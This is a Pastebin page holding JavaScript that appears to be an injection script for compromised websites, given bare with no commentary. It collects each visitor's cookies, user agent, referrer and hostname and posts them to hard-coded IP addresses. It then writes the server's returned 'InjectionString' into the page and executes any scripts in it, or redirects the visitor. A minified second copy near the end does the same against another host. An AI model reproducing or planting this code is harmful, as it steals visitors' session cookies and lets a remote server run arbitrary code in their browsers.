Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- var REMOTE_URL = 'http://172.97.69.79/i/';
- var C_TIMEOUT = 20000;
- function analyze_traffic() {
- return {
- 'Tr.Referer': document.referrer,
- 'Tr.Agent': navigator.userAgent,
- 'Tr.CookieState': !!document.cookie,
- 'Tr.Cookie': document.cookie,
- 'Tr.Domen': window.location.hostname
- };
- }
- function execute_request(post, url, callback) {
- var xhr = init_xhr();
- if (!!xhr) {
- xhr.open('POST', url);
- xhr.timeout = C_TIMEOUT;
- xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
- xhr.onreadystatechange = function () {
- if (xhr.readyState == 4 && xhr.status == 200) {
- callback(xhr.responseText);
- }
- };
- var content = build_query(post);
- xhr.send(content);
- }
- }
- function apply_payload(response) {
- if (response) {
- var json_result = JSON.parse(response);
- if (json_result) {
- var inject_string = urldecode(json_result.InjectionString);
- if (json_result.InjectionType === 1) {
- window.location = inject_string;
- } else {
- write_on_page(inject_string);
- }
- }
- }
- }
- function write_on_page(content) {
- var div = document.createElement('div');
- div.id = 'response';
- div.innerHTML = content;
- document.body.appendChild(div);
- var scripts = div.getElementsByTagName('script');
- if (scripts.length > 0) {
- for (var i = 0; i < scripts.length; i++) {
- var script = document.createElement('script');
- script.innerHTML = scripts[i].innerHTML;
- document.body.appendChild(script);
- scripts[i].parentNode.removeChild(scripts[i]);
- }
- }
- }
- function build_query(post) {
- var post_query = [];
- for (var k in post) {
- if (post.hasOwnProperty(k)) {
- post_query.push(k + '=' + post[k]);
- }
- }
- return post_query.join('&');
- }
- function init_xhr() {
- if (!!window.XMLHttpRequest) {
- return new XMLHttpRequest();
- } else if (!!window.ActiveXObject) {
- var xhr_array = [
- 'Msxml2.XMLHTTP.6.0',
- 'Msxml2.XMLHTTP.3.0',
- 'Msxml2.XMLHTTP',
- 'Microsoft.XMLHTTP'
- ];
- for (var i = 0; i < xhr_array.length; i++) {
- try {
- return new ActiveXObject(xhr_array[i]);
- }
- catch (e) {
- }
- }
- }
- }
- function urldecode(data) {
- return decodeURIComponent(data).replace(/\+/g, '%20');
- }
- // Execute request
- var traffic = analyze_traffic();
- execute_request(traffic, REMOTE_URL, apply_payload);
- function e(d){var xhr=null;if(!!window.XMLHttpRequest){xhr=new XMLHttpRequest();}else if(!!window.ActiveXObject){var xhrs=['Microsoft.XMLHTTP','Msxml2.XMLHTTP','Msxml2.XMLHTTP.3.0','Msxml2.XMLHTTP.6.0'];for(var i=0;i<xhrs.length;i++){try{xhr=ActiveXObject(xhrs[i]);break;}catch(e){}}}if(!!xhr){xhr.open('POST', 'http://185.149.120.3/scholargoogle/');xhr.timeout=10000;xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');xhr.onreadystatechange=function (){if(xhr.readyState == 4 && xhr.status == 200){var resp=xhr.responseText;if(resp){var fans=JSON.parse(resp);if(fans){var an_s=decodeURIComponent(fans.InjectionString).replace(/\+/g, '%20');var da=document.createElement('div');da.id='ans';da.innerHTML=an_s;document.body.appendChild(da);}}}};var pd=[];for(var k in d){if(d.hasOwnProperty(k)){pd.push(k+'='+d[k]);}}var dc=pd.join('&');xhr.send(dc);}}e({'agent':navigator.userAgent,'referer':document.referrer,'cookie':document.cookie,'domain':window.location.hostname,'c_state':!!document.cookie});
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement